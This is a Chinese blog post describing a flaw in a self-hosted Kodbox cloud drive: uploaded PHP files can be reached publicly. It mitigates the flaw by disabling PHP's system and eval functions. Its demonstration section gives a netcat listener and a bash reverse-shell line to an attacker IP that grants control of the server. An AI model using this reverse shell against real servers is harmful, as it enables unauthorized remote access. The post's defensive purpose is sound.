部署可道云网盘的一个漏洞解决

文章讲述了可道云网盘中存在的安全漏洞,如通过域名获取用户UID和利用反弹shell攻击。防范措施包括禁用`system`和`eval`函数以及重启PHP-FPM服务。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

目录

 

1漏洞展示

2.防范措施 


1漏洞展示

因为可道云网盘的上传文档有保存在 /data/Group/public/home/文档/ 中,当别有用心之人知道个人部署的域名与上次的文件后,可以进行访问拿到uid。例我在我部署的网盘上上次一个aa.php 文件,然后拿来演示

 然后通过域名与路径在浏览器上访问拿到uid ,对用户进行访问控制

UID(用户标识)可以用于识别用户或实体的唯一标识符。它可以用于访问特定用户的个人资料、记录用户的活动、管理用户权限和访问控制、跟踪用户行为等。在不同的系统和应用程序中,UID可以用于各种目的,例如身份验证、授权、数据分析等。UID的用途取决于具体的应用场景和需求。 

 2)反弹shell 

这样别人就可以在他个人虚拟机上安装 nc 

yum install nc -y

 开启监听

nc -lvnp 9999

 然后他就在访问的文件中添加bash ,即将访问控制发生给他个人的 主机上

xxxx -i >& /dev/tcp/192.168.XX.XXX/9999 0>&1 
#xxxx表示bash
# 攻击机的ip地址:192.168.XX.XXX
# 攻击机nc监听的端口:9999

 然后他再次访问,就可以拿到控制权限

2.防范措施 

禁用 system 函数

vim /etc/php.ini
# 修改314行
314 disable_functions = system,eval
# 重启php-fpm
systemctl restart php-fpm.service 
# 然后再监听,再访问就发现反弹不了了。

 步骤,来到 vim 下,没进入编辑前,先 :/disable ,即查找关键字disable;然后:set number ,显示行数,找到314 行,进行修改

再次监听后就拿不到 uid 了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Fly upward

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值